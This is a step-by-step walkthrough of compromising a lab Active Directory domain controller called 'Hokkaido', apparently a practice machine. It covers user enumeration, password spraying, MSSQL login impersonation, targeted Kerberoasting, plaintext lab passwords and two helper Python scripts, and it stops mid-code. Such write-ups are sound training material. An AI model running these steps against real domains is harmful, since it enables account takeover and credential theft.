Machine Information
- Machine Name: Hokkaido
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
Nmap scan report for 192.168.135.40
Host is up, received user-set (0.029s latency).
Scanned at 2024-10-19 13:02:47 +08 for 542s
Not shown: 65502 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 125
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-19 05:03:12Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA/domainComponent=hokkaido-aerospace
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
| SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA/domainComponent=hokkaido-aerospace
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
| SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
1433/tcp open ms-sql-s syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-10-19T05:11:47+00:00; -1s from scanner time.
| ms-sql-ntlm-info:
| 192.168.135.40:1433:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
|_ Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after: 2054-08-02T02:13:54
| MD5: 594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
| SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
| ms-sql-info:
| 192.168.135.40:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA/domainComponent=hokkaido-aerospace
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
| SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
3269/tcp open ssl/ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA/domainComponent=hokkaido-aerospace
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
| SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2024-10-19T05:11:47+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Issuer: commonName=dc.hokkaido-aerospace.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-01T02:13:36
| Not valid after: 2025-01-31T02:13:36
| MD5: 19e7:3538:6f5e:0a49:0192:1363:cba9:a224
| SHA-1: b3b9:d742:1c06:70dd:c0f8:db08:7807:8ae1:ab54:92bc
| rdp-ntlm-info:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
| Product_Version: 10.0.20348
|_ System_Time: 2024-10-19T05:11:32+00:00
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8530/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
8531/tcp open unknown syn-ack ttl 125
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
47001/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49684/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49691/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49712/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
58538/tcp open ms-sql-s syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 192.168.135.40:58538:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 58538
|_ssl-date: 2024-10-19T05:11:47+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after: 2054-08-02T02:13:54
| MD5: 594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
| SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
| ms-sql-ntlm-info:
| 192.168.135.40:58538:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
|_ Product_Version: 10.0.20348
I usually start out with port 80, but there was nothing interesting there. I also looked into the other potential ports, but nothing seemed useful. I then looked at port 88 to get some potential usernames first.
Port 88
./kerbrute_linux_386 userenum /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 192.168.135.40 -d hokkaido-aerospace.com
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/19/24 - Ronnie Flathers @ropnop
2024/10/19 13:17:25 > Using KDC(s):
2024/10/19 13:17:25 > 192.168.135.40:88
2024/10/19 13:17:25 > [+] VALID USERNAME: info@hokkaido-aerospace.com
2024/10/19 13:17:28 > [+] VALID USERNAME: administrator@hokkaido-aerospace.com
2024/10/19 13:17:30 > [+] VALID USERNAME: INFO@hokkaido-aerospace.com
2024/10/19 13:17:38 > [+] VALID USERNAME: Info@hokkaido-aerospace.com
2024/10/19 13:17:48 > [+] VALID USERNAME: discovery@hokkaido-aerospace.com
2024/10/19 13:17:48 > [+] VALID USERNAME: Administrator@hokkaido-aerospace.com
2024/10/19 13:21:45 > [+] VALID USERNAME: maintenance@hokkaido-aerospace.com
I managed to get some potential usernames by using kerbrute. Now that I have usernames, I tried common passwords such as rockyou.txt and also reusing the username as the password.
netexec ldap 192.168.135.40 -u user -p user
SMB 192.168.135.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
LDAP 192.168.135.40 389 DC [+] hokkaido-aerospace.com\info:info
Since I have access to LDAP, I tried to get more information by utilising bloodhound-python first.
bloodhound-python -d 'hokkaido-aerospace.com' -u 'info' -p 'info' -ns 192.168.135.40 -c All --zip
INFO: Found AD domain: hokkaido-aerospace.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 34 users
INFO: Found 62 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: dc.hokkaido-aerospace.com
INFO: Done in 00M 03S
INFO: Compressing output into 20241019134205_bloodhound.zip
After that, time to import the data into BloodHound and have a quick look.
After having a quick look, it seems my current user is not that useful. Time to continue with the other ports first.
Port 139/445
Since LDAP works, I assume SMB would also work.
netexec smb 192.168.135.40 -u user -p user
SMB 192.168.135.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB 192.168.135.40 445 DC [+] hokkaido-aerospace.com\info:info
Since the credential works, I have a look at which shares I have access to.
smbmap -H 192.168.135.40 -u info -p info
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.40:445 Name: hokkaido-aerospace.com Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
homes READ, WRITE user homes
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
UpdateServicesPackages READ ONLY A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent READ ONLY A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections
It seems I have read access to some of the shares. After going through them, I noticed some interesting information.
smbmap -H 192.168.135.40 -u info -p info -r homes
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.40:445 Name: hokkaido-aerospace.com Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
homes READ, WRITE user homes
./homes
dr--r--r-- 0 Sat Oct 19 14:08:12 2024 .
dr--r--r-- 0 Sat Oct 19 13:01:32 2024 ..
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Angela.Davies
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Annette.Buckley
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Anthony.Anderson
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Catherine.Knight
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Charlene.Wallace
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Cheryl.Singh
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Deborah.Francis
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Declan.Woodward
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Elliott.Jones
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Gordon.Brown
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Grace.Lees
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Hannah.O'Neill
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Irene.Dean
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Julian.Davies
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Lynne.Tyler
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Molly.Edwards
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Rachel.Jones
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Sian.Gordon
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Tracy.Wood
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Victor.Kelly
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
UpdateServicesPackages READ ONLY A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent READ ONLY A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections
smbmap -H 192.168.135.40 -u info -p info -r NETLOGON --depth 2
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.40:445 Name: hokkaido-aerospace.com Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
homes READ, WRITE user homes
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
./NETLOGON
dr--r--r-- 0 Sat Nov 25 21:40:08 2023 .
dr--r--r-- 0 Sat Nov 25 21:17:33 2023 ..
dr--r--r-- 0 Wed Dec 6 23:44:26 2023 temp
./NETLOGON//temp
dr--r--r-- 0 Wed Dec 6 23:44:26 2023 .
dr--r--r-- 0 Sat Nov 25 21:40:08 2023 ..
fr--r--r-- 27 Wed Dec 6 23:44:26 2023 password_reset.txt
SYSVOL READ ONLY Logon server share
UpdateServicesPackages READ ONLY A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent READ ONLY A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections
It seems there are a lot of potential usernames and a potential password file. I then save the usernames and download password_reset.txt.
smbmap -H 192.168.135.40 -u info -p info --download 'NETLOGON/temp/password_reset.txt'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: NETLOGON\temp\password_reset.txt (27 bytes)
[+] File output to: /root/pg/Hokkaido/192.168.135.40-NETLOGON_temp_password_reset.txt
[*] Closed 1 connections
cat 192.168.135.40-NETLOGON_temp_password_reset.txt
Initial Password: Start123!
Now that I have a new password and a list of usernames, time to spray again. The -u argument below is the username file rather than a single account. Two habits worth keeping when spraying one password across many accounts: check the lockout threshold first (netexec's --pass-pol option on the smb protocol prints it), and pass --continue-on-success so the run does not stop at the first valid login.
netexec ldap 192.168.135.40 -u user -p 'Start123!'
SMB 192.168.135.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\info:Start123!
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\administrator:Start123!
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\INFO:Start123!
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\Info:Start123!
LDAP 192.168.135.40 389 DC [+] hokkaido-aerospace.com\discovery:Start123!
Another new user. Time to look at BloodHound again to see what this account can do. I could not find anything useful there, so I sprayed the other services with the same credentials instead.
netexec mssql 192.168.135.40 -u discovery -p 'Start123!'
MSSQL 192.168.135.40 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)
MSSQL 192.168.135.40 1433 DC [+] hokkaido-aerospace.com\discovery:Start123!
Time to have a look at the MSSQL port.
Port 1433
impacket-mssqlclient hokkaido-aerospace.com/discovery:'Start123!'@192.168.135.40 -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (HAERO\discovery guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
The first thing I tried after getting in was enabling xp_cmdshell so I could execute commands, but the login does not have the permission: RECONFIGURE needs ALTER SETTINGS, which only the sysadmin and serveradmin roles hold by default. So I looked at what I do have access to, starting with the databases.
SQL (HAERO\discovery guest@master)> enum_db
name is_trustworthy_on
------- -----------------
master 0
tempdb 0
model 0
msdb 1
hrappdb 0
SQL (HAERO\discovery guest@master)> use hrappdb
ERROR: Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.
There is a database called hrappdb that looks interesting, but my login cannot access it. Next I checked whether I could impersonate another login on the server.
SQL (HAERO\discovery guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- -------------- --------------
b'LOGIN' b'' IMPERSONATE GRANT HAERO\services hrappdb-reader
So IMPERSONATE has been granted on the hrappdb-reader login. The grantee shown is HAERO\services rather than my own login, so discovery presumably receives the right through membership of that Windows group (an assumption; the output does not show group membership). Either way, EXECUTE AS LOGIN should switch me to hrappdb-reader, and I hoped that login can reach hrappdb. Impersonation stays in effect for the session until REVERT, so everything I run afterwards is checked against hrappdb-reader's permissions, not discovery's.
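The enum_impersonate step above is one query plus one EXECUTE AS; the general version is a small graph problem, because impersonation rights chain (if A can impersonate B and B can impersonate C, A reaches C) and a right granted to a Windows group login applies to every member. The following is an added example, not code from the walkthrough or from impacket. The rows are constructed: only the HAERO\services -> hrappdb-reader edge comes from the output above, the second hop to hrapp-auditor is hypothetical, and the assumption that discovery belongs to HAERO\services is mine. ENUM_QUERY is the T-SQL you would run against sys.server_permissions to obtain such rows for real.

```python
from collections import deque

# T-SQL that returns (grantee, target) pairs for IMPERSONATE on server logins.
# class 101 = SERVER_PRINCIPAL, type 'IM' = IMPERSONATE, state G/W = granted.
ENUM_QUERY = """
SELECT grantee.name AS grantee, target.name AS target, p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals AS target  ON p.major_id = target.principal_id
WHERE p.class = 101 AND p.type = 'IM' AND p.state IN ('G', 'W');
"""

# Constructed sample rows: the first mirrors the walkthrough output (the grantee
# is the Windows group HAERO\services); the second hop is hypothetical and only
# there to show that chains are followed.
IMPERSONATE_ROWS = [
    ("HAERO\\services", "hrappdb-reader"),
    ("hrappdb-reader", "hrapp-auditor"),
]


def reachable_logins(rows, start_principals):
    """Breadth-first search over IMPERSONATE edges.

    start_principals is the current login plus the Windows group logins present
    in its token (a grant to a group login covers its members). Returns a dict
    mapping each reachable login to the login it is impersonated from
    (None for the starting principals).
    """
    edges = {}
    for grantee, target in rows:
        edges.setdefault(grantee, []).append(target)
    parent = {p: None for p in start_principals}
    queue = deque(start_principals)
    while queue:
        cur = queue.popleft()
        for nxt in edges.get(cur, []):
            if nxt not in parent:  # first visit = shortest chain
                parent[nxt] = cur
                queue.append(nxt)
    return parent


def plan_statements(rows, start_principals, target):
    """Return the T-SQL needed to reach `target`, or None if no chain exists.

    Each EXECUTE AS LOGIN pushes a context; the matching REVERTs unwind it, so
    the session ends as the original login rather than stuck as the last hop.
    """
    start_principals = set(start_principals)
    parent = reachable_logins(rows, start_principals)
    if target not in parent:
        return None
    chain = []
    node = target
    while node not in start_principals:
        chain.append(node)
        node = parent[node]
    chain.reverse()
    stmts = []
    for login in chain:
        safe = login.replace("'", "''")  # T-SQL string-literal escaping
        stmts.append(f"EXECUTE AS LOGIN = '{safe}';")
    return stmts + ["REVERT;"] * len(chain)


if __name__ == "__main__":
    token = {"HAERO\\discovery", "HAERO\\services"}  # login plus assumed group
    for stmt in plan_statements(IMPERSONATE_ROWS, token, "hrapp-auditor"):
        print(stmt)
```

Feed it the rows ENUM_QUERY returns and the groups from the current token (SELECT * FROM sys.login_token shows them) and it prints the exact statements to paste into mssqlclient; a None result means there is no impersonation path from your login, group memberships included.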
SQL (HAERO\discovery guest@master)> execute as login = 'hrappdb-reader'
SQL (hrappdb-reader guest@master)> use hrappdb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';
TABLE_NAME
----------
sysauth
SQL (hrappdb-reader hrappdb-reader@hrappdb)> select * from sysauth;
id name password
-- ---------------- ----------------
0 b'hrapp-service' b'Untimed$Runny'
Impersonating that login got me into the database and gave me a credential: hrapp-service with the password Untimed$Runny. Time to check BloodHound again.
hrapp-service has GenericWrite over hazel.green. GenericWrite on a user object lets me write its servicePrincipalName attribute, so I can add an SPN to hazel.green, request a service ticket for it and crack that ticket offline: a targeted Kerberoast. I used targetedKerberoast.py, which adds the SPN, requests the ticket, prints the hash and removes the SPN again.
python targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Hazel.Green)
[+] Printing hash for (Hazel.Green)
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/Hazel.Green*$3bf76c903da0babcf1c26d7b783c9ca4$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
[VERBOSE] SPN removed successfully for (Hazel.Green)
[+] Printing hash for (discovery)
$krb5tgs$23$*discovery$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/discovery*$b1039309385c477097a249a92d9d05a8$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
[+] Printing hash for (maintenance)
$krb5tgs$23$*maintenance$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/maintenance*$d133bd7548be53a72fe5d106699f7b5e$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
That gives three hashes: hazel.green's, plus discovery and maintenance, which already had SPNs and so got roasted as well (the tool collects every Kerberoastable account it can see, not only the one it added an SPN to). The $krb5tgs$23$ prefix means the tickets were issued with RC4 (etype 23), the cheap one to crack. I saved hazel.green's hash to a file and ran john against it with rockyou.
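Before spending cracking time it is worth reading what the tool handed back. Below is an added example (not part of the walkthrough or of targetedKerberoast) that parses the two hash layouts in circulation and reports the encryption type: $krb5tgs$23$*user$REALM$spn*$checksum$edata2 as john and hashcat mode 13100 expect, and $krb5tgs$18$user$REALM$checksum$edata2 for AES tickets (hashcat 19600/19700, no SPN field). The two sample lines are constructed with made-up hex bodies; the real checksums and ticket data above are not reused, and the AES account name is hypothetical.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}
# Length of the checksum field in hex characters: RC4 tickets carry a 16-byte
# HMAC-MD5, AES tickets a 12-byte truncated HMAC-SHA1.
CHECKSUM_HEX_LEN = {23: 32, 17: 24, 18: 24}
_HEX = re.compile(r"^[0-9a-fA-F]+$")


@dataclass
class RoastedTicket:
    etype: int
    user: str
    realm: str
    spn: Optional[str]
    checksum: str
    edata2_hex_len: int

    @property
    def fast_to_crack(self) -> bool:
        """RC4 (etype 23) is orders of magnitude cheaper per guess than AES."""
        return self.etype == 23


def parse_krb5tgs(line: str) -> RoastedTicket:
    line = line.strip()
    prefix = "$krb5tgs$"
    if not line.startswith(prefix):
        raise ValueError("not a $krb5tgs$ hash")
    etype_s, sep, rest = line[len(prefix):].partition("$")
    if not sep or not etype_s.isdigit():
        raise ValueError("missing etype")
    etype = int(etype_s)
    if etype not in ETYPE_NAMES:
        raise ValueError(f"unsupported etype {etype}")

    if rest.startswith("*"):
        # *user$REALM$spn* layout. rsplit copes with machine accounts whose
        # sAMAccountName ends in '$' (e.g. DC$), since realm and SPN contain none.
        ident, sep, tail = rest[1:].partition("*$")
        if not sep:
            raise ValueError("unterminated identity field")
        parts = ident.rsplit("$", 2)
        if len(parts) != 3:
            raise ValueError("identity field needs user$REALM$spn")
        user, realm, spn = parts
        checksum, sep, edata2 = tail.partition("$")
    else:
        # user$REALM$checksum$edata2 layout (no SPN recorded in the hash)
        parts = rest.rsplit("$", 2)
        if len(parts) != 3:
            raise ValueError("expected user$REALM$checksum$edata2")
        head, checksum, edata2 = parts
        user, sep, realm = head.rpartition("$")
        if not sep:
            raise ValueError("missing realm")
        spn = None

    if not (_HEX.match(checksum) and _HEX.match(edata2)):
        raise ValueError("checksum and edata2 must be hex")
    if len(checksum) != CHECKSUM_HEX_LEN[etype]:
        raise ValueError(f"etype {etype} checksum should be {CHECKSUM_HEX_LEN[etype]} hex chars")
    return RoastedTicket(etype, user, realm, spn, checksum.lower(), len(edata2))


def summarize(lines: List[str]) -> List[dict]:
    """One row per hash: whose ticket it is and whether it is worth cracking first."""
    out = []
    for line in lines:
        if not line.strip():
            continue
        t = parse_krb5tgs(line)
        out.append({"user": t.user, "realm": t.realm, "spn": t.spn,
                    "etype": ETYPE_NAMES[t.etype], "fast_to_crack": t.fast_to_crack})
    return out


# Constructed sample hashes: realistic layout, made-up hex bodies.
# svc.example is a hypothetical account, used only to show the AES layout.
SAMPLE_HASHES = [
    "$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/Hazel.Green*$"
    "0123456789abcdef0123456789abcdef$" + "a1b2c3d4" * 16,
    "$krb5tgs$18$svc.example$HOKKAIDO-AEROSPACE.COM$"
    "00112233445566778899aabb$" + "f0e1d2c3" * 16,
]

if __name__ == "__main__":
    for row in summarize(SAMPLE_HASHES):
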